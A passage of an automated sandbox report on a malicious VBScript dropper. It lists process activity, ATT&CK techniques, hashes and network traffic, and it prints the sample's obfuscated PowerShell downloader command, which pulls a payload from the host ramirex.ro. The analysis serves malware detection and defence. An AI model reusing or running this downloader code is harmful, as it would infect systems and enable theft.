        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2237631693.0000023E75FEE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2237168004.0000023E75E4A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb[j source: powershell.exe, 00000002.00000002.2237168004.0000023E75E4A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb3 source: powershell.exe, 00000002.00000002.2237631693.0000023E75FEE000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "$Megampere='Sub';$Megampere+='strin';$Sensualistiske = 1;$Megampere+='g';Function Skdefrakker($Gyldig", "0")
        Source: Yara match File source: 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Teems)$global:Gstgiver = [System.Text.Encoding]::ASCII.GetString($Codevelopers)$global:Antinihilism=$Gstgiver.substring($Romantikers,$Gabions) if (
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Megampere='Sub';$Megampere+='strin';$Sensualistiske = 1;$Megampere+='g';Function Skdefrakker($Gyldigt){$Doors=$Gyldigt.Length-$Sensualistiske;For($Papirtigerne=5;$Papirtigerne -lt $Doors;$Papirtigerne+=6){$Reoxygenize+=$Gyldigt.$Megampere.Invoke( $Papirtigerne, $Sensualistiske);}$Reoxygenize;}function Hadaway($Awiggle){ & ($Feeblenesses) ($Awiggle);}$Allitterationernes=Skdefrakker ' InveMUnstaozithazFort.i .ontlAcro.lWo riaOffen/,odel5Snf,e. Svir0Apag. Medle(F aktWAlureiAngwin Salpd fortoAkti wFo,eosDeval ,latfNgrozaT Midt Teleg1Sa.pe0Di,se.bedir0Franc; Toxi Non.WSlur iDerkrnmaner6Qui.q4 Tids; Spaa DiffxAde,o6Non.q4Bedri;fogus Skivr,lommvSlagl:incom1Sti l2 Cy,t1Pundu.Paran0Still),asto LadeGSangueunp,rc ,ithkRoop oPreco/,enom2Besva0Covis1 Inno0Pudsi0Harpe1 B.mp0In,an1Chait GotthFPrikkiSlfanrDrapfeHy,stfPeakioB.gcaxNoi.e/Sanit1Van b2furil1Klept.Augus0Cente ';$Unresponsible=Skdefrakker 'I.ddaUGrappsElbapeHovedrInten-AdskiA Rel.gAgerbeUns,rnFluort In,k ';$Gualaca=Skdefrakker 'SowabhSubtotFedtetAnsatpElizas Forr: uci/Fakul/ ChrorE.togaRecormBenzoiBlundrMozegeCentaxKo le.Grun r LogfoFo,dl/Sli euSchatn,nterp AerorRespoiFnugln MinicLogiciUnderpAquarl.iiiseT.ividR.gti.SketcsVir.eeTr usapaala ';$sacrum=Skdefrakker 'Llers>Frugt ';$Feeblenesses=Skdefrakker 'BulimiRemaie vi.txBryll ';$Lophiostomous='Westfilms';$Opkrsler250 = Skdefrakker ' Lo he TralcUdholh JagtoFreda Brune%Se.weaBrne,pD.iftpChokpdV.lutaOptrktStendaSangu%Slumm\ or dDStandsAbette ,nken S lgerorsc.AramiKopponnU,dereHarmo in,on& A zo&Ko ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens 
paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue c
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD349771C5 push edi; retf 2_2_00007FFD349771C6
        Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4921
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4942
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5580 Thread sleep time: -4611686018427385s >= -30000s
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: powershell.exe, 00000002.00000002.2237631693.0000023E75FD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

        HIPS / PFW / Operating System Protection Evasion

        Source: Yara match File source: amsi64_2664.amsi.csv, type: OTHER
        Source: Yara match File source: Process Memory Space: powershell.exe PID: 2664, type: MEMORYSTR
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dsene.Kne && echo t"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$megampere='sub';$megampere+='strin';$sensualistiske = 1;$megampere+='g';function skdefrakker($gyldigt){$doors=$gyldigt.length-$sensualistiske;for($papirtigerne=5;$papirtigerne -lt $doors;$papirtigerne+=6){$reoxygenize+=$gyldigt.$megampere.invoke( $papirtigerne, $sensualistiske);}$reoxygenize;}function hadaway($awiggle){ & ($feeblenesses) ($awiggle);}$allitterationernes=skdefrakker ' invemunstaozithazfort.i .ontlacro.lwo riaoffen/,odel5snf,e. svir0apag. medle(f aktwalureiangwin salpd fortoakti wfo,eosdeval ,latfngrozat midt teleg1sa.pe0di,se.bedir0franc; toxi non.wslur iderkrnmaner6qui.q4 tids; spaa diffxade,o6non.q4bedri;fogus skivr,lommvslagl:incom1sti l2 cy,t1pundu.paran0still),asto ladegsangueunp,rc ,ithkroop opreco/,enom2besva0covis1 inno0pudsi0harpe1 b.mp0in,an1chait gotthfprikkislfanrdrapfehy,stfpeakiob.gcaxnoi.e/sanit1van b2furil1klept.augus0cente ';$unresponsible=skdefrakker 'i.ddaugrappselbapehovedrinten-adskia rel.gagerbeuns,rnfluort in,k ';$gualaca=skdefrakker 'sowabhsubtotfedtetansatpelizas forr: uci/fakul/ chrore.togarecormbenzoiblundrmozegecentaxko le.grun r logfofo,dl/sli euschatn,nterp aerorrespoifnugln miniclogiciunderpaquarl.iiiset.ividr.gti.sketcsvir.eetr usapaala ';$sacrum=skdefrakker 'llers>frugt ';$feeblenesses=skdefrakker 'bulimiremaie vi.txbryll ';$lophiostomous='westfilms';$opkrsler250 = skdefrakker ' lo he tralcudholh jagtofreda brune%se.weabrne,pd.iftpchokpdv.lutaoptrktstendasangu%slumm\ or ddstandsabette ,nken s lgerorsc.aramikopponnu,dereharmo in,on& a zo&ko ku va,deoverpcunde.hsco,ooskopu deputfeday ';hadaway (skdefrakker ' fors$v lgrgrkeb lsherrostophboverfabisexllustr:mumb.reksemaharemdstilbiovereootosaa dublctoneatmac.si out.vsamboepiloc=prism(dishwcloo emchiqudblake ant,t/.gnencsdigh faste$ gemsostatsp ugebkdublirpreens 
paralexcesedimenrinco.2ind.a5klas,0t,ana)m,rkw ');hadaway (skdefrakker 'exfig$ afmag estolrekogopropubplopsaorloglbange:.eglvddoorkecel irgourmvma,kei gasospolith anthl at minonphkrenulerekto= sl.m$corslg lillu sterat.ykplagraraadrescbartea tran.wo ris.ontop grealax.nei par.tstjfl( peri$mutins al,uastalic ,ytire.traubreakmconci)unmov ');$gualaca=$dervishlike[0];$mayaca= (skdefrakker 'com,r$ intrgo.erlltra hosdva b,kohoau,dullsortk: kon.w iba.a no puadvanbgeroden.areetilbunhexac2s.der0tima 5dan e=puttinforgje intew sm d-h.smao junkbtorpej homoef rticmisceteurok h,roispantiynabonsantebtwakasegrif,mheste.obtrunop,ege scrutangri.r.chrwfr kee bldsbrearrcnondelselekibolige,radan cognt');$mayaca+=$radioactive[1];hadaway ($mayaca);hadaway (skdefrakker 'nytte$opka wele,eastblouudtr,b klone cla,eproctngasbo2tilhy0echin5neuro.gli,shsup re uninaboligdfremfemisjorfingesdater[bankv$hi,liu snounleggiracrotegr,ndsfond.p,rodeohovedncrosssmichei gobebshuddlwodelemaa e]guill=vanfu$pennea ki slante linterifictit uri,tpred.e drkir,oamba outwthauboivehemoarmo n ge be semir moden wofue c
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (per tactic; the number shown before a technique is the count the report attaches to it)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: 221 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 11 Command and Scripting Interpreter; 1 Exploitation for Client Execution; 2 PowerShell; Cron; Launchd; Scheduled Task
Persistence: 221 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 12 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
IMG-35235235523525235252532535Selvfinansieret.vbs | 3% | ReversingLabs |
IMG-35235235523525235252532535Selvfinansieret.vbs | 6% | Virustotal |
No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://crl.m | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://ramirex.ro/unprincipled.seaP | 0% | Avira URL Cloud | safe
http://ramirex.ro | 0% | Avira URL Cloud | safe
https://ramirex.ro/unprincipled.sea | 0% | Avira URL Cloud | safe
https://ramirex.ro | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ramirex.ro | 188.215.50.15 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://ramirex.ro/unprincipled.sea | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ramirex.ro/unprincipled.seaP | powershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.m | powershell.exe, 00000002.00000002.2237631693.0000023E75FEE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.micro | powershell.exe, 00000002.00000002.2185875177.0000023E01373000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2185875177.0000023E00001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2185875177.0000023E00001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ramirex.ro | powershell.exe, 00000002.00000002.2185875177.0000023E01DAF000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ramirex.ro | powershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2185875177.0000023E018BC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.215.50.15 | ramirex.ro | Romania | 34358 | WEBCLASSITRO | false
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1448280
          Start date and time:2024-05-28 08:08:09 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 24s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:8
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:IMG-35235235523525235252532535Selvfinansieret.vbs
          Detection:MAL
          Classification:mal100.troj.expl.evad.winVBS@6/4@1/1
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 7
          • Number of non-executed functions: 4
          Cookbook Comments:
          • Found application associated with file extension: .vbs
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target powershell.exe, PID 2664 because it is empty
          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
02:08:56 | API Interceptor | 46x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WEBCLASSITRO | BM-FM_NR.24040718PDF.exe | malicious | FormBook, GuLoader | 37.251.143.215
WEBCLASSITRO | nOrden_de_compra.exe | malicious | AgentTesla, PureLog Stealer | 89.32.46.159
WEBCLASSITRO | Project_Offer_2024.exe | malicious | AgentTesla | 89.32.46.159
WEBCLASSITRO | ndHq.exe | malicious | AgentTesla | 89.32.46.159
WEBCLASSITRO | arm7-20240101-1250.elf | malicious | Mirai | 37.251.157.173
WEBCLASSITRO | MS Document.html | malicious | Phisher | 37.251.137.194
WEBCLASSITRO | 3m37SZRkdC.elf | malicious | Mirai | 37.251.157.145
WEBCLASSITRO | meerkat.x86.elf | malicious | Mirai | 37.251.157.141
WEBCLASSITRO | 1x9SsU5xOL.elf | malicious | Mirai | 37.251.157.133
WEBCLASSITRO | 73IQC7zT52.elf | malicious | Mirai, Moobot | 37.251.157.188
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Company Profile.PDF.exe | malicious | AgentTesla | 188.215.50.15
3b5074b1b5d032e5620f69f9f700ff0e | b86258bbf5182d3da8292cbff6262a90cef9dd418fd8b6706fde5747662da2ae_dump.bin.exe | malicious | AgentTesla, PureLog Stealer | 188.215.50.15
3b5074b1b5d032e5620f69f9f700ff0e | oxi.ps1 | malicious | DarkGate, MailPassView | 188.215.50.15
3b5074b1b5d032e5620f69f9f700ff0e | http://corporativoentornomedico.com/natwes/natwest3/details.php | malicious | Unknown | 188.215.50.15
3b5074b1b5d032e5620f69f9f700ff0e | https://centroingles.com.ar/pf/potfinance/login.php | malicious | Unknown | 188.215.50.15
3b5074b1b5d032e5620f69f9f700ff0e | Puchase.js | malicious | AgentTesla | 188.215.50.15
3b5074b1b5d032e5620f69f9f700ff0e | Shipping Documents inv. 523435300XX.exe | malicious | AgentTesla, PureLog Stealer | 188.215.50.15
3b5074b1b5d032e5620f69f9f700ff0e | oxi.ps1 | malicious | DarkGate, MailPassView | 188.215.50.15
3b5074b1b5d032e5620f69f9f700ff0e | http://see-track.com/ | malicious | Unknown | 188.215.50.15
3b5074b1b5d032e5620f69f9f700ff0e | Doc_10577030xls.exe | malicious | AgentTesla, PureLog Stealer | 188.215.50.15
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):64
          Entropy (8bit):1.1940658735648508
          Encrypted:false
          SSDEEP:3:Nlllul/nq/llh:NllUyt
          MD5:AB80AD9A08E5B16132325DF5584B2CBE
          SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
          SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
          SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:@...e................................................@..........
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Reputation:high, very likely benign file
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:dropped
          Size (bytes):393216
          Entropy (8bit):5.964352319625788
          Encrypted:false
          SSDEEP:6144:U9Rk1UTdV0+vK43TRe8w1ESVbQiH19dogc1AextsFWWrOeutAF0LNyQw:QQie+vKoTR31KQiVzINxbW6BiOkQw
          MD5:1E4C3183865F00292E4EC27F5D274FEA
          SHA1:4681A96102079FC9E3B87724CF05F496B9A2D539
          SHA-256:39B622ABB4AA40D6CE21A9A7E96CD4456C726CAB285B8E8496EBC396A4AEBF24
          SHA-512:97F5985296DE2E5B6299BDEC98DC4C4E81D4E39BBB23250BA3D95E5DD1382D9EB471DA89557FEC9CEDAA639D9646B73B32BCE0993454E68989E17C893B9673C4
          Malicious:false
          Reputation:low
          File type:ASCII text, with CRLF line terminators
          Entropy (8bit):4.521499470798273
          TrID:
          • Visual Basic Script (13500/0) 100.00%
          File name:IMG-35235235523525235252532535Selvfinansieret.vbs
          File size:20'681 bytes
          MD5:a6cf7a17bac5acfed8b42dae16767f8e
          SHA1:2f9499cee74dfb887b549c5766c4f5dfec9743e0
          SHA256:412da635eb16946ae92c0648efe4f687771f3625eedeacd3f2889862ed492658
          SHA512:513888bfb57737aa4986aad18b638b6b4ecab5c9e1c28ab802de01bbb6d1d13cc07c458a7d676f14a8f554d6e965b1c586b7e2023681aabf6de1e48899cfa96b
          SSDEEP:192:EfdXmXLS7d8zaEvBwLQZ9HAkDsDoIZQe8x2cKnl7jlC17UvpMp1TI5Q/Q2Tn0ejF:EUg1uco3aVWUafIi42TnFjF
          TLSH:D392FB9CA7E35AF08BB43E598486BCB8F7724E11C510B4CD3D2C97BA24322479E0759D
          File Content Preview:.. ......Function Etageejendom(Cathected)....Etageejendom = ChrW(Cathected)....End Function .... ..Forstrkningsbjlkerne = 0.... ..Indpak= array(71-1+0,69,77,59,72,73,62,59,66,66).... ....T0 = Simiousness79 .... ..Dim Waveform.... ..for Stikningerne=0
          Icon Hash:68d69b8f86ab9a86
          UDP packets
          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          May 28, 2024 08:08:58.127305031 CEST | 53642 | 53 | 192.168.2.6 | 1.1.1.1
          May 28, 2024 08:08:58.194695950 CEST | 53 | 53642 | 1.1.1.1 | 192.168.2.6
          DNS queries
          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
          May 28, 2024 08:08:58.127305031 CEST | 192.168.2.6 | 1.1.1.1 | 0x43cf | Standard query (0) | ramirex.ro | A (IP address) | IN (0x0001) | false
          DNS answers
          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
          May 28, 2024 08:08:58.194695950 CEST | 1.1.1.1 | 192.168.2.6 | 0x43cf | No error (0) | ramirex.ro | | 188.215.50.15 | A (IP address) | IN (0x0001) | false
          • ramirex.ro
          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          0 | 192.168.2.6 | 49699 | 188.215.50.15 | 443 | 2664 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Timestamp | Bytes transferred | Direction | Data
          2024-05-28 06:08:59 UTC | 170 | OUT | GET /unprincipled.sea HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
          Host: ramirex.ro
          Connection: Keep-Alive
          2024-05-28 06:08:59 UTC | 342 | IN | HTTP/1.1 200 OK
          Date: Tue, 28 May 2024 06:08:58 GMT
          Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_qos/11.5 mod_fcgid/2.3.9
          Last-Modified: Sun, 26 May 2024 13:35:09 GMT
          ETag: "26600d8-67280-6195b78317f1c"
          Accept-Ranges: bytes
          Content-Length: 422528
          Connection: close
          Content-Type: text/plain
          2024-05-28 06:08:59 UTC | 16384 | IN | Data Ascii: 6wLNMOsCEni7yBoUAHEBm+sC6soDXCQEcQGb6wI2mLnad/+acQGb6wIWnoHpSbqfrHEBm+sCR8CB6ZG9X+5xAZvrAlMT6wIWTusCC4u6WePEkusCK/pxAZtxAZtxAZsxynEBm+sCqwqJFAvrAqx8cQGb0eLrAj1C6wI2m4PBBOsCeEzrAklagfn45xYEfMrrAhE+6wKgZotEJATrAnGT6wIErInD6wKLr3EBm4HD2ok5A3EBm3EBm7rayIT3cQG
          2024-05-28 06:08:59 UTC | 16384 | IN | Data Ascii: AAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoiigRRq+R2dtakr0s7zJU0kpWXTaL27EHUhUBSa47MGQpRbX85fd8KE4Fz5L/GLfwHQW/+9bm4kKvP4UzUAWP1k+bu0K3iCh5Y9TiSqaFdl4gvYW3VxpbDF0dD0M8vCGcEZbWywC+gvF+VCZGnN1xwlW7fsP+DVp4Kaq7nEC0oxDXcbPWXPJ
